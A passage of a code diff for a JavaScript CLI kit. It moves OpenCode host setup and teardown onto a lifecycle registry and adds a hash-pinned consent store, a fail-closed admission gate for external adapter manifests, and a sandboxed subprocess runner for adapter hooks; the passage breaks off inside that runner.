+      info(`${hostId}: enabled but CLI not installed — wiring skipped (hosts step installs it)`);
+      continue;
     }
+    const lifecycle = await runLifecycle({
+      adapter: lifecycleAdapterFor(hostId), action: 'apply', cfg, options: { pkgRoot },
+    });
+    const stack = lifecycle.result;
+    // persist the markers on ANY refresh (a converged file whose kit.json
+    // markers are stale/missing still needs the save, or the next teardown
+    // cannot prove ownership — codex-review r3), not only on file changes.
+    if (stack.oc.changed || stack.markersChanged) saveKitConfig(cfg);
+    if (stack.oc.changed || !stack.oc.ok) report('opencode', stack.oc);
+    report('opencode plugin', stack.plugin);
+    report('opencode agents', stack.agents);
+    if (stack.skill.changed || !stack.skill.ok) report('opencode skill', stack.skill);
   }
   // The 'opencode' guard: the opencode branch above can CREATE the config home
   // that activates the agents-opencode guidance target — a machine whose other

--- a/src/commands/uninstall.mjs
+++ b/src/commands/uninstall.mjs
@@ -9,8 +9,9 @@ import readline from 'node:readline/promises';
 import { run as runCmd } from '../lib/exec.mjs';
 import { stripBlock, BEGIN, BUILTIN_BLOCKS } from '../lib/blocks.mjs';
 import { unregister } from '../lib/mcp.mjs';
-import { retireOpencode } from '../lib/opencode.mjs';
 import { loadKitConfig, saveKitConfig } from '../lib/config.mjs';
+import { runLifecycle } from '../lib/adapters/lifecycle.mjs';
+import { hostsWithLifecycle, lifecycleAdapterFor } from '../lib/adapters/lifecycle-registry.mjs';
 import { present as rbPresent } from '../lib/ruvnet-brain.mjs';
 import * as paths from '../lib/paths.mjs';
 import { ok, warn, info } from '../lib/output.mjs';
@@ -121,23 +122,36 @@ export async function run({ flags }) {
       });
     }
   }
-  {
-    // cfg comes from the top of run() (read before any purge of kit.json).
-    // --purge removes kit.json above; persisting cfg here would recreate it.
-    if (cfg.integrations?.ownership?.opencode?.mcp === 'ak') {
-      if (dry) info('[dry-run] stripped ak-managed opencode wiring + artifacts (opencode.json, plugin, agents, skill)');
-      else {
-        const ret = retireOpencode(cfg);
-        ownershipTeardownOk = ret.ok;
-        if (!flags.purge) saveKitConfig(cfg);
-        (ret.ok ? ok : warn)(ret.ok
-          ? 'stripped ak-managed opencode wiring + artifacts (opencode.json, plugin, agents, skill)'
-          : `opencode teardown incomplete — ${ret.undo.detail}`);
-      }
-    } else if (fs.existsSync(paths.opencodeDir())) {
-      // Not ak-managed (or never enabled): artifacts are still marker-gated, so
-      // only ak-deployed files leave — user-owned agents/skills/plugins stay.
-      act('removed ak-deployed opencode artifacts (plugin/agents/skill)', () => { retireOpencode(cfg); });
+  // Registry-driven host lifecycle teardown — reached by id, never by name
+  // (mirrors x/host.mjs's off(), which does its undo the same way). cfg comes
+  // from the top of run() (read before any purge of kit.json); --purge
+  // removes kit.json below, so persisting cfg here would recreate it. Each
+  // adapter's own undo() already honors ownership/receipts (opencode's
+  // undoOpencode no-ops when it never held mcp:'ak', and marker-gates
+  // artifact removal independent of that), so this call is unconditional per
+  // host — the only kit-side gate is "did anything actually happen", to
+  // avoid a no-op teardown line (and a needless kit.json rewrite) on a host
+  // that was never enabled.
+  for (const hostId of hostsWithLifecycle()) {
+    const adapter = lifecycleAdapterFor(hostId);
+    if (dry) {
+      info(`[dry-run] stripped ak-managed ${hostId} wiring + artifacts (opencode.json, plugin, agents, skill)`);
+      continue;
+    }
+    const retired = await runLifecycle({ adapter, action: 'undo', cfg });
+    const ret = retired.result;
+    ownershipTeardownOk = ownershipTeardownOk && ret.ok;
+    // Persist markers unconditionally, exactly like x/host.mjs's off()/pick():
+    // undo() mutates cfg's ownership markers in memory even when it rewrote
+    // no file (`undo.changed` measures the FILE, not cfg), so gating the save
+    // on `changed` would strand a stale mcp:'ak' receipt forever on the
+    // quiet-success path. Only the human-facing line stays gated on "did
+    // anything observable happen".
+    if (!flags.purge) saveKitConfig(cfg);
+    if (ret.undo.changed || ret.artifacts.changed || !ret.ok) {
+      (ret.ok ? ok : warn)(ret.ok
+        ? `stripped ak-managed ${hostId} wiring + artifacts (opencode.json, plugin, agents, skill)`
+        : `${hostId} teardown incomplete — ${ret.undo.detail}`);
     }
   }
   if (flags.purge && fs.existsSync(paths.kitConfigPath())) {

--- a/src/commands/uninstall.mjs
+++ b/src/commands/uninstall.mjs
@@ -11,7 +11,7 @@ import { stripBlock, BEGIN, BUILTIN_BLOCKS } from '../lib/blocks.mjs';
 import { unregister } from '../lib/mcp.mjs';
 import { loadKitConfig, saveKitConfig } from '../lib/config.mjs';
 import { runLifecycle } from '../lib/adapters/lifecycle.mjs';
-import { hostsWithLifecycle, lifecycleAdapterFor } from '../lib/adapters/lifecycle-registry.mjs';
+import { builtinHostsWithLifecycle, lifecycleAdapterFor } from '../lib/adapters/lifecycle-registry.mjs';
 import { present as rbPresent } from '../lib/ruvnet-brain.mjs';
 import * as paths from '../lib/paths.mjs';
 import { ok, warn, info } from '../lib/output.mjs';
@@ -131,8 +131,12 @@ export async function run({ flags }) {
   // artifact removal independent of that), so this call is unconditional per
   // host — the only kit-side gate is "did anything actually happen", to
   // avoid a no-op teardown line (and a needless kit.json rewrite) on a host
-  // that was never enabled.
-  for (const hostId of hostsWithLifecycle()) {
+  // that was never enabled. builtinHostsWithLifecycle() (not
+  // hostsWithLifecycle()) deliberately excludes admitted external hosts:
+  // this loop body destructures an opencode-shaped result (ret.undo,
+  // ret.artifacts) — see lifecycle-registry.mjs's registerAdmittedLifecycle
+  // comment for why external lifecycle execution isn't wired through here yet.
+  for (const hostId of builtinHostsWithLifecycle()) {
     const adapter = lifecycleAdapterFor(hostId);
     if (dry) {
       info(`[dry-run] stripped ak-managed ${hostId} wiring + artifacts (opencode.json, plugin, agents, skill)`);

--- a/src/commands/x/host.mjs
+++ b/src/commands/x/host.mjs
@@ -19,6 +19,7 @@ import { loadKitConfig, saveKitConfig } from '../../lib/config.mjs';
 import { reconcileOpencodeGuidance } from '../../lib/opencode.mjs';
 import { runLifecycle } from '../../lib/adapters/lifecycle.mjs';
 import { lifecycleAdapterFor } from '../../lib/adapters/lifecycle-registry.mjs';
+import { hostTierLabel, hostAsymmetryNote } from '../../lib/hosts.mjs';
 import {
   routableHostIds, defaultHostMap, validateBinding, HOST_REGISTRY, PROVIDER_REGISTRY,
 } from '../../lib/adapters/index.mjs';
@@ -195,12 +196,13 @@ async function status({ flags, cwd }) {
       : dflt ? 'enabled (default — ruflo default-on, no env written)'
       : d.wired ? 'enabled, wired'
       : 'enabled, not wired → ak sync';
-    const tier = h.id === 'opencode' ? dim('  · routing host (ak run; never primary/AQE)')
-      : dim('  · routing host');
+    const tier = dim(`  · ${hostTierLabel(h.id)}`);
     // auth/billing axis — subscription ($0) vs metered key, per host.
     const auth = d.present ? hostAuthState(h.id, { present: true }) : null;
     const authStr = auth ? dim(`  ${auth.mode}/${auth.billing === 'subscription' ? '$0' : auth.billing}`) : '';
     console.log(`  ${h.id.padEnd(9)} ${(d.version ? `v${d.version}` : '—').padEnd(12)} ${state}${authStr}${tier}`);
+    const note = hostAsymmetryNote(h.id);
+    if (note) console.log(`    ${dim(note)}`);
   }
 
   // agentic-qe LLM provider (AQE_LLM_PROVIDER) + fallback chain

--- a/src/commands/x/host.mjs
+++ b/src/commands/x/host.mjs
@@ -16,8 +16,9 @@ import {
 } from '../../lib/providers.mjs';
 import { parseRouteSpecs, formatModelHelp, PRIMARY_HOSTS, DEFAULT_PRIMARY_HOST, divergedRoutes, refreshSeededRoutes, pruneRoutesForHosts, modelNote, ACTIVITIES } from '../../lib/routing.mjs';
 import { loadKitConfig, saveKitConfig } from '../../lib/config.mjs';
-import { OPENCODE_LIFECYCLE_ADAPTER, reconcileOpencodeGuidance } from '../../lib/opencode.mjs';
+import { reconcileOpencodeGuidance } from '../../lib/opencode.mjs';
 import { runLifecycle } from '../../lib/adapters/lifecycle.mjs';
+import { lifecycleAdapterFor } from '../../lib/adapters/lifecycle-registry.mjs';
 import {
   routableHostIds, defaultHostMap, validateBinding, HOST_REGISTRY, PROVIDER_REGISTRY,
 } from '../../lib/adapters/index.mjs';
@@ -337,7 +338,7 @@ async function off({ cwd, pkgRoot }) {
   const rufloCodexManaged = cfg.integrations?.ownership?.codex?.reverseMcp === 'ak';
   // OpenCode teardown reads its ownership receipt before the host/routing reset.
   // A failed teardown retains that receipt (including catalogDir) for a retry.
-  const retired = await runLifecycle({ adapter: OPENCODE_LIFECYCLE_ADAPTER, action: 'undo', cfg });
+  const retired = await runLifecycle({ adapter: lifecycleAdapterFor('opencode'), action: 'undo', cfg });
   const ret = retired.result;
   cfg.providers = {
     aqeProvider: null,
@@ -629,7 +630,7 @@ async function pick({ flags, cwd, pkgRoot }) {
       warn('opencode: enabled but CLI not installed — wiring skipped (re-run `ak sync` after installing opencode-ai)');
     } else {
       const lifecycle = await runLifecycle({
-        adapter: OPENCODE_LIFECYCLE_ADAPTER, action: 'apply', cfg, options: { pkgRoot },
+        adapter: lifecycleAdapterFor('opencode'), action: 'apply', cfg, options: { pkgRoot },
       });
       const stack = lifecycle.result;
       // persist the markers on ANY refresh (converged file + stale markers is
@@ -653,7 +654,7 @@ async function pick({ flags, cwd, pkgRoot }) {
     // never the user's own opencode config. A teardown that cannot complete
     // (e.g. a JSONC config) is reported honestly — markers stay for the retry
     // and "disabled" is never claimed over still-active wiring.
-    const retired = await runLifecycle({ adapter: OPENCODE_LIFECYCLE_ADAPTER, action: 'undo', cfg });
+    const retired = await runLifecycle({ adapter: lifecycleAdapterFor('opencode'), action: 'undo', cfg });
     const ret = retired.result;
     saveKitConfig(cfg); // persist markers (nulled on success, retained on failure)
     if (ret.ok) ok(`opencode disabled: ${ret.undo.detail}; ${ret.artifacts.detail}`);

--- a/src/lib/adapters/admission.mjs
+++ b/src/lib/adapters/admission.mjs
@@ -1,0 +1,190 @@
+// Fail-closed admission gate for externally-sourced host-adapter manifests
+// (Adapter Contract Dossier). admitAdapters walks cfg.hostAdapters and, for
+// each entry, validates the manifest, verifies its declared contract is one
+// this version supports, and checks a canonicalized content hash against an
+// injected consent store — never prompting interactively itself. Per-entry
+// isolation: one bad adapter is refused in place and never affects any other
+// entry or the built-in registries (try/caught per entry, in admitOne AND as
+// a belt-and-suspenders net in admitAdapters).
+import { createHash } from 'node:crypto';
+import { HOST_REGISTRY } from './registries.mjs';
+import { validateAdapterManifest } from './manifest.mjs';
+
+export const SUPPORTED_CONTRACT = 1;
+
+/** Deterministic, key-sorted JSON — same stable-stringify shape used
+ *  elsewhere in this codebase (e.g. opencode.mjs's deepEqual) so two manifests
+ *  that differ only in key order or incidental whitespace hash identically.
+ *  The sort comparator is a plain code-unit compare, NOT localeCompare: with
+ *  localeCompare, key order (and therefore the hash) could shift across
+ *  locales (e.g. en_US vs sv_SE collation), so a CI runner or container with
+ *  a different locale than where consent was recorded could see a bogus
+ *  consent-stale refusal for a manifest that never actually changed. */
+export function canonicalizeManifest(value) {
+  return JSON.stringify(value, (_key, val) => (
+    val && typeof val === 'object' && !Array.isArray(val)
+      ? Object.fromEntries(Object.entries(val).sort(([a], [b]) => (a < b ? -1 : a > b ? 1 : 0)))
+      : val
+  ));
+}
+
+export function hashManifest(value) {
+  return createHash('sha256').update(canonicalizeManifest(value)).digest('hex');
+}
+
+const builtinIds = () => new Set(HOST_REGISTRY.map((host) => host.id));
+
+async function admitOne(entry, { readManifest, consent, builtins }) {
+  const name = entry?.name;
+  if (typeof name !== 'string' || !name) {
+    return { name: name ?? '(unknown)', admitted: false, reason: 'invalid-entry', detail: 'cfg.hostAdapters entry requires a name' };
+  }
+  if (typeof entry.source !== 'string' || !entry.source) {
+    return { name, admitted: false, reason: 'invalid-entry', detail: 'cfg.hostAdapters entry requires a source' };
+  }
+
+  let raw;
+  try {
+    raw = await readManifest(entry.source);
+  } catch (error) {
+    return { name, admitted: false, reason: 'manifest-unreadable', detail: error?.message ?? String(error) };
+  }
+
+  // cfg's own pinned contract (if declared) disagreeing with the manifest's
+  // self-declared contract is a distinct failure from "unsupported version" —
+  // it means the operator pinned to a manifest that changed underneath them.
+  if (entry.contract !== undefined && raw?.contract !== undefined && entry.contract !== raw.contract) {
+    return {
+      name, admitted: false, reason: 'contract-mismatch',
+      detail: `cfg declares contract ${entry.contract}, manifest declares ${raw.contract}`,
+    };
+  }
+
+  let manifest;
+  try {
+    manifest = validateAdapterManifest(raw);
+  } catch (error) {
+    return { name, admitted: false, reason: error?.reason ?? 'manifest-invalid', detail: error?.message ?? String(error) };
+  }
+
+  if (manifest.contract !== SUPPORTED_CONTRACT) {
+    return { name, admitted: false, reason: 'contract-version', detail: `unsupported contract ${manifest.contract}` };
+  }
+
+  if (manifest.host.id !== name) {
+    return { name, admitted: false, reason: 'name-mismatch', detail: `cfg entry '${name}' does not match manifest host id '${manifest.host.id}'` };
+  }
+
+  if (builtins.has(manifest.host.id)) {
+    return { name, admitted: false, reason: 'builtin-shadow', detail: `'${manifest.host.id}' is a built-in host id` };
+  }
+
+  const hash = hashManifest(manifest);
+  let recorded;
+  try {
+    recorded = consent.recordedHashFor(name);
+  } catch (error) {
+    return { name, admitted: false, reason: 'consent-error', detail: error?.message ?? String(error) };
+  }
+  if (recorded == null) {
+    return { name, admitted: false, reason: 'consent-required', detail: `no recorded consent for '${name}'` };
+  }
+
+  let trusted;
+  try {
+    trusted = consent.isTrusted(name, hash);
+  } catch (error) {
+    return { name, admitted: false, reason: 'consent-error', detail: error?.message ?? String(error) };
+  }
+  if (!trusted || recorded !== hash) {
+    return { name, admitted: false, reason: 'consent-stale', detail: `manifest hash ${hash} does not match consented ${recorded}` };
+  }
+
+  return { name, admitted: true, entry: manifest.host, manifest };
+}
+
+/**
+ * @param {{ cfg: any, readManifest: (source: string) => Promise<any>,
+ *   consent: { recordedHashFor(name: string): string|null, isTrusted(name: string, hash: string): boolean } }} args
+ * @returns {Promise<Array<{name:string, admitted:boolean, reason?:string, detail?:string, entry?:any, manifest?:any}>>}
+ */
+export async function admitAdapters({ cfg, readManifest, consent }) {
+  const entries = Array.isArray(cfg?.hostAdapters) ? cfg.hostAdapters : [];
+  const builtins = builtinIds();
+  const results = [];
+  // Sequential, not Promise.all: entries are independent, but sequential
+  // admission keeps refusal isolation trivial to reason about (and cfg's
+  // adapter counts are small — this is not a hot loop).
+  for (const entry of entries) {
+    try {
+      results.push(await admitOne(entry, { readManifest, consent, builtins }));
+    } catch (error) {
+      // Belt-and-suspenders: admitOne already catches every known failure
+      // point, but an unforeseen throw must still isolate to this one entry.
+      results.push({ name: entry?.name ?? '(unknown)', admitted: false, reason: 'admission-error', detail: error?.message ?? String(error) });
+    }
+  }
+  return results;
+}
+
+async function defaultReadManifest(source) {
+  const fs = await import('node:fs/promises');
+  const raw = await fs.readFile(source, 'utf8');
+  return JSON.parse(raw);
+}
+
+/**
+ * CLI bootstrap entry point — the only call site production code needs
+ * (`bootstrapHostAdapters({cfg, env})`, wired from bin/agentic-kit.mjs).
+ * Everything is guarded and non-fatal: with the flag unset or no configured
+ * adapters, this returns immediately with zero side effects (no dynamic
+ * import, no filesystem read, no admission work) — the flag-off no-op is
+ * pinned by a test. `readManifest`/`consent` are optional injection points
+ * for tests; production relies on the defaults (a plain fs+JSON.parse reader,
+ * and a dynamic import of the sibling consent store in ./consent.mjs).
+ * @param {{ cfg?: any, env?: NodeJS.ProcessEnv, readManifest?: (source: string) => Promise<any>,
+ *   consent?: { recordedHashFor(name: string): string|null, isTrusted(name: string, hash: string): boolean } }} [args]
+ */
+export async function bootstrapHostAdapters({
+  cfg, env = process.env, readManifest = defaultReadManifest, consent,
+} = {}) {
+  if (env?.AK_EXPERIMENTAL_HOST_ADAPTERS !== '1') return { active: false, admitted: [], warnings: [] };
+  const entries = Array.isArray(cfg?.hostAdapters) ? cfg.hostAdapters : [];
+  if (entries.length === 0) return { active: false, admitted: [], warnings: [] };
+
+  let consentStore = consent;
+  if (!consentStore) {
+    try {
+      // Sibling-owned module (consent.mjs); dynamic so this file loads even
+      // before it lands, and so tests never pay for it unless they choose to.
+      // consent.mjs exports recordedHashFor/isTrusted as plain named
+      // functions (no wrapper object) — the module namespace itself already
+      // satisfies {recordedHashFor(name), isTrusted(name,hash)}; the
+      // consentStore/default fallbacks are just tolerance for a future
+      // reshape, not the shape it ships today.
+      // Cast to `any`: consent.mjs's real, current shape has neither
+      // `consentStore` nor `default` — the fallback chain below is tolerance
+      // for a future reshape (see the comment above), not today's actual
+      // module namespace type, so a literal type there would just be wrong.
+      const mod = /** @type {any} */ (await import('./consent.mjs'));
+      consentStore = mod.consentStore ?? mod.default ?? mod;
+    } catch (error) {
+      const warnings = entries.map((raw) => ({
+        name: raw?.name ?? '(unknown)', reason: 'consent-unavailable', detail: error?.message ?? String(error),
+      }));
+      return { active: true, admitted: [], warnings };
+    }
+  }
+
+  const results = await admitAdapters({ cfg, readManifest, consent: consentStore });
+  const admitted = results.filter((result) => result.admitted);
+  const warnings = results.filter((result) => !result.admitted)
+    .map(({ name, reason, detail }) => ({ name, reason, detail }));
+
+  if (admitted.length) {
+    const { applyAdmitted } = await import('./admitted.mjs');
+    applyAdmitted(admitted);
+  }
+
+  return { active: true, admitted, warnings };
+}

--- a/src/lib/adapters/admitted.mjs
+++ b/src/lib/adapters/admitted.mjs
@@ -1,0 +1,64 @@
+// Overlay holding admitted external host entries — set once per process by
+// bootstrapHostAdapters (admission.mjs) after admitAdapters has already
+// refused any entry that would collide with a built-in id. This module does
+// NOT re-check the built-in-shadow invariant; it trusts admission's output
+// for that. It DOES, however, re-run every stored entry through
+// validateHostAdapter (registries.mjs) before accepting it — see
+// conformOne below.
+import { HOST_REGISTRY, validateHostAdapter } from './registries.mjs';
+
+let admittedEntries = Object.freeze([]);
+let applied = false;
+
+/**
+ * Minimal shape gate + deep-freeze for one overlay entry, by re-running it
+ * through validateHostAdapter with no projections/observability maps
+ * injected (so only structural shape — not registry cross-references — is
+ * re-verified). In the real bootstrapHostAdapters path this is always a
+ * no-op pass-through: admitAdapters already produced `entry` by calling
+ * validateHostAdapter once, inside validateAdapterManifest, so re-running it
+ * here just re-derives an equally-valid, equally-frozen clone. It exists so
+ * a caller that bypasses admission entirely — a bug, a future refactor, or a
+ * raw object handed to applyAdmitted directly — gets a loud construction-time
+ * TypeError instead of an unvalidated, possibly-privileged-looking entry
+ * (e.g. `{id, capabilities:{canBePrimary:true}}`) silently joining
+ * effectiveHostRegistry(). applyAdmitted only accepts genuine admission
+ * output; anything else is rejected, never silently coerced.
+ * @param {any} item — a raw host entry, or an admission result `{entry}`
+ */
+function conformOne(item) {
+  return validateHostAdapter(item?.entry ?? item);
+}
+
+/**
+ * Set the admitted overlay. Accepts either raw host entries or admission
+ * results ({name, admitted, entry, manifest}) — whichever admitAdapters
+ * handed back — validates + deep-freezes the host entry from each (throws on
+ * a non-conforming entry), and stores the result. A second call replaces the
+ * overlay outright (useful for tests via resetAdmitted()); production calls
+ * this at most once per process since the env flag gates it.
+ * @param {ReadonlyArray<any>} entries
+ */
+export function applyAdmitted(entries) {
+  admittedEntries = Object.freeze((entries ?? []).map(conformOne));
+  applied = true;
+  return admittedEntries;
+}
+
+/** Test-only reset back to the unapplied, builtins-only state. */
+export function resetAdmitted() {
+  admittedEntries = Object.freeze([]);
+  applied = false;
+}
+
+export function admittedHostIds() {
+  return admittedEntries.map((entry) => entry.id);
+}
+
+/** Built-ins + admitted externals, both frozen. Returns HOST_REGISTRY itself
+ *  (same reference) when nothing has been admitted, so callers that never
+ *  opt into the experimental flag see byte-identical behavior. */
+export function effectiveHostRegistry() {
+  if (!applied || admittedEntries.length === 0) return HOST_REGISTRY;
+  return Object.freeze([...HOST_REGISTRY, ...admittedEntries]);
+}

--- a/src/lib/adapters/consent.mjs
+++ b/src/lib/adapters/consent.mjs
@@ -1,0 +1,91 @@
+// Hash-pinned adapter trust store (Codex-hooks/Hermes-allowlist precedent).
+// A JSON map of adapter name -> { hash, consentedAt } under the kit config
+// dir. Edit-invalidation is inherent: change an adapter's hook command and
+// its hash changes, so `isTrusted` fails closed until consent is re-granted.
+//
+// No interactive prompting lives here — consent is GRANTED elsewhere (a
+// future `ak host adapters trust <name>` command). `recordConsent` is the
+// programmatic seam that command will call.
+import fs from 'node:fs';
+import path from 'node:path';
+import { configDir } from '../paths.mjs';
+
+export const adapterConsentPath = () => path.join(configDir(), 'adapter-consent.json');
+
+function readStore(file) {
+  let raw;
+  try {
+    raw = fs.readFileSync(file, 'utf8');
+  } catch {
+    return {};
+  }
+  try {
+    const parsed = JSON.parse(raw);
+    return parsed && typeof parsed === 'object' && !Array.isArray(parsed) ? parsed : {};
+  } catch {
+    return {};
+  }
+}
+
+/** Atomic tmp+rename write at 0600, matching the rest of the kit's
+ * user-owned config writes (live/process-sessions.mjs's WorkspaceSnapshotStore). */
+function writeStore(file, store) {
+  fs.mkdirSync(path.dirname(file), { recursive: true, mode: 0o700 });
+  const tmp = `${file}.${process.pid}.${Date.now()}.tmp`;
+  let renamed = false;
+  try {
+    fs.writeFileSync(tmp, `${JSON.stringify(store, null, 2)}\n`, { mode: 0o600 });
+    fs.renameSync(tmp, file);
+    renamed = true;
+  } finally {
+    if (!renamed) {
+      try { fs.rmSync(tmp, { force: true }); } catch { /* cleanup must not mask the write error */ }
+    }
+  }
+  try { fs.chmodSync(file, 0o600); } catch { /* best-effort on platforms without POSIX perms */ }
+}
+
+function validEntry(value) {
+  return !!value && typeof value === 'object'
+    && typeof value.hash === 'string' && value.hash.length > 0
+    && typeof value.consentedAt === 'string' && Number.isFinite(Date.parse(value.consentedAt));
+}
+
+/** The hash this adapter was last consented to, or null if never recorded
+ * (or the file is missing/unreadable/corrupt — this never throws). */
+export function recordedHashFor(name, { file = adapterConsentPath() } = {}) {
+  if (typeof name !== 'string' || !name) return null;
+  const entry = readStore(file)[name];
+  return validEntry(entry) ? entry.hash : null;
+}
+
+/** True only on an exact hash match against the recorded consent. Any
+ * mismatch — including "never consented" — is untrusted. */
+export function isTrusted(name, hash, { file = adapterConsentPath() } = {}) {
+  if (typeof hash !== 'string' || !hash) return false;
+  const recorded = recordedHashFor(name, { file });
+  return recorded !== null && recorded === hash;
+}
+
+/** Record consent for `name` at `hash`, overwriting any prior entry. */
+export function recordConsent(name, hash, { file = adapterConsentPath() } = {}) {
+  if (typeof name !== 'string' || !name) throw new TypeError('recordConsent requires an adapter name');
+  if (typeof hash !== 'string' || !hash) throw new TypeError('recordConsent requires a hash');
+  const store = readStore(file);
+  store[name] = { hash, consentedAt: new Date().toISOString() };
+  writeStore(file, store);
+}
+
+/** Remove any recorded consent for `name`. Returns whether an entry existed. */
+export function revokeConsent(name, { file = adapterConsentPath() } = {}) {
+  if (typeof name !== 'string' || !name) return false;
+  const store = readStore(file);
+  // Object.hasOwn, not `name in store`: `in` walks the prototype chain, so
+  // revokeConsent('constructor') (or 'toString', 'hasOwnProperty', ...)
+  // would read true off Object.prototype and report revoking consent for an
+  // adapter that was never actually consented to.
+  if (!Object.hasOwn(store, name)) return false;
+  delete store[name];
+  writeStore(file, store);
+  return true;
+}

--- a/src/lib/adapters/hook-runner.mjs
+++ b/src/lib/adapters/hook-runner.mjs
@@ -1,0 +1,201 @@
+// The ONLY way an external adapter's code ever executes: a supervised,
+// short-lived subprocess. Adapters are untrusted code with an explicit exit
+// door, not co-processes we trust to clean up after themselves — no shell,
+// a minimal environment, bounded captured output, and the whole process
+// group dies the instant a timeout fires.
+//
+// Deliberately simpler than execution/subprocess.mjs: one shot, no streaming
+// summary capture, no graceful-then-forced two-step shutdown. A timed-out
+// adapter hook gets no cleanup grace period; it already spent its budget.
+import { spawn as nodeSpawn, execFile as nodeExecFile } from 'node:child_process';
+
+const DEFAULT_TIMEOUT_MS = 30_000;
+const OUTPUT_CAP_BYTES = 256 * 1024;
+const TRUNCATION_MARKER = `\n…[truncated: adapter hook output exceeded ${OUTPUT_CAP_BYTES} bytes]`;
+const STDERR_SEPARATOR = '\n--- stderr ---\n';
+// Bounded wait for the process to actually report closed after a kill signal
+// is sent. SIGKILL is not a promise the OS keeps synchronously; this is a
+// safety net so a stuck kernel-blocked process can't hang the caller forever.
+const KILL_GRACE_MS = 2_000;
+const isWindows = process.platform === 'win32';
+const TIMEOUT_SENTINEL = Symbol('adapter-hook-timeout');
+
+/** Min-wins: whichever side asked for the tighter budget governs. A hook
+ * cannot escalate past a caller-imposed ceiling, and a caller cannot force a
+ * hook to run longer than the hook itself declared it needs. Neither side
+ * specifying a timeout falls back to the 30s default. */
+function resolveTimeout(paramTimeoutMs, hookTimeoutMs) {
+  const candidates = [paramTimeoutMs, hookTimeoutMs].filter(
+    (value) => Number.isFinite(value) && value > 0,
+  );
+  return candidates.length ? Math.min(...candidates) : DEFAULT_TIMEOUT_MS;
+}
+
+/** PATH, HOME, plus caller-passed entries only — never the full
+ * process.env. Adapters must not inherit ak's secrets. */
+function minimalEnv(extra) {
+  const env = {};
+  if (typeof process.env.PATH === 'string') env.PATH = process.env.PATH;
+  if (typeof process.env.HOME === 'string') env.HOME = process.env.HOME;
+  if (extra && typeof extra === 'object') {
+    for (const [key, value] of Object.entries(extra)) {
+      if (typeof key === 'string' && key && typeof value === 'string') env[key] = value;
+    }
+  }
+  return env;
+}
+
+/** Accumulate chunks up to a hard byte ceiling, then silently drop the rest,
+ * remembering that a drop happened. Bounds memory during the run itself —
+ * the final combined-stream cap (and truncation marker) is applied
+ * separately once both streams are known, but a stream truncated on its own
+ * must still be reported as truncated even if it lands exactly at the cap. */
+function boundedCollector(capBytes) {
+  let buffer = Buffer.alloc(0);
+  let truncated = false;
+  return {
+    write(chunk) {
+      if (buffer.length >= capBytes) {
+        if (chunk.length > 0) truncated = true;
+        return;
+      }
+      const next = Buffer.concat([buffer, chunk]);
+      if (next.length > capBytes) {
+        truncated = true;
+        buffer = next.subarray(0, capBytes);
+      } else {
+        buffer = next;
+      }
+    },
+    text() { return buffer.toString('utf8'); },
+    wasTruncated() { return truncated; },
+  };
+}
+
+/** stdout first, then stderr folded in after a separator, then the whole
+ * thing capped at OUTPUT_CAP_BYTES with a truncation marker appended if
+ * anything was cut — whether that happened while collecting a single
+ * oversized stream, or only once the two streams were combined. Never
+ * unbounded. */
+function mergeCapture(stdout, stderr) {
+  const combined = stderr.text ? `${stdout.text}${STDERR_SEPARATOR}${stderr.text}` : stdout.text;
+  const combinedBytes = Buffer.byteLength(combined, 'utf8');
+  const overflow = combinedBytes > OUTPUT_CAP_BYTES;
+  if (!stdout.truncated && !stderr.truncated && !overflow) return combined;
+  const kept = overflow
+    ? Buffer.from(combined, 'utf8').subarray(0, OUTPUT_CAP_BYTES).toString('utf8')
+    : combined;
+  return `${kept}${TRUNCATION_MARKER}`;
+}
+
+function describeFailure(hostId, verb, error) {
+  const reason = error?.code ? `${error.code} (${error.message ?? 'no message'})` : (error?.message ?? String(error));
+  return `${hostId}:${verb} adapter hook failed to start: ${reason}`;
+}
+
+function raceTimeout(promise, ms) {
+  return new Promise((resolve) => {
+    const timer = setTimeout(() => resolve(TIMEOUT_SENTINEL), ms);
+    promise.then((value) => { clearTimeout(timer); resolve(value); });
+  });
+}
+
+/** Best-effort kill of the whole process group/tree, not just the direct
+ * child — a timed-out adapter hook may have spawned descendants of its own.
+ * POSIX: the child was spawned detached so its pid is also its process group
+ * id; signalling `-pid` reaches the whole group. Windows has no portable
+ * signal for arbitrary console trees, so `taskkill /T /F` owns it there. */
+async function killGroup(child) {
+  if (!Number.isInteger(child?.pid)) return;
+  if (isWindows) {
+    await new Promise((resolve) => {
+      nodeExecFile('taskkill.exe', ['/PID', String(child.pid), '/T', '/F'], () => resolve(undefined));
+    });
+    return;
+  }
+  try {
+    process.kill(-child.pid, 'SIGKILL');
+  } catch {
+    try { child.kill('SIGKILL'); } catch { /* process already gone */ }
+  }
+}
+
+/**
+ * Run one adapter hook as a supervised subprocess and report what happened.
+ * Never throws for process failures (ENOENT, timeout, non-zero exit) — those
+ * are reported via `ok:false` and `detail`. Only malformed call arguments
+ * (missing/invalid `hook`, `hostId`, or `verb`) throw synchronously.
+ *
+ * @param {{hook:{command:string[], timeoutMs?:number}, hostId:string,
+ *   verb:string, timeoutMs?:number, env?:Record<string,string>}} options
+ * @returns {Promise<{ok:boolean, stdout:string, exitCode:number|null, detail:string|null}>}
+ */
+export async function runAdapterHook({ hook, hostId, verb, timeoutMs, env } = /** @type {any} */ ({})) {
+  if (!hook || !Array.isArray(hook.command) || hook.command.length === 0
+    || !hook.command.every((part) => typeof part === 'string' && part.length > 0)) {
+    throw new TypeError('runAdapterHook requires hook.command as a non-empty array of non-empty strings');
+  }
+  if (typeof hostId !== 'string' || !hostId) throw new TypeError('runAdapterHook requires a hostId');
+  if (typeof verb !== 'string' || !verb) throw new TypeError('runAdapterHook requires a verb');
+
+  const effectiveTimeoutMs = resolveTimeout(timeoutMs, hook.timeoutMs);
+  const [argv0, ...args] = hook.command;
+  const childEnv = minimalEnv(env);
+
+  let child;
+  try {
+    child = nodeSpawn(argv0, args, {
+      env: childEnv,
+      shell: false,
+      stdio: ['ignore', 'pipe', 'pipe'],
+      detached: !isWindows,
+    });
+  } catch (error) {
+    return { ok: false, stdout: '', exitCode: null, detail: describeFailure(hostId, verb, error) };
+  }
+
+  const stdoutCollector = boundedCollector(OUTPUT_CAP_BYTES);
+  const stderrCollector = boundedCollector(OUTPUT_CAP_BYTES);
+  child.stdout?.on('data', (chunk) => stdoutCollector.write(chunk));
+  child.stderr?.on('data', (chunk) => stderrCollector.write(chunk));
+
+  let settled = false;
+  let spawnError = null;
+  const closeResult = new Promise((resolve) => {
+    child.once('error', (error) => {
+      spawnError = error;
+      if (!settled) { settled = true; resolve({ code: null, signal: null }); }
+    });
+    child.once('close', (code, signal) => {
+      if (!settled) { settled = true; resolve({ code, signal }); }
+    });
+  });
+
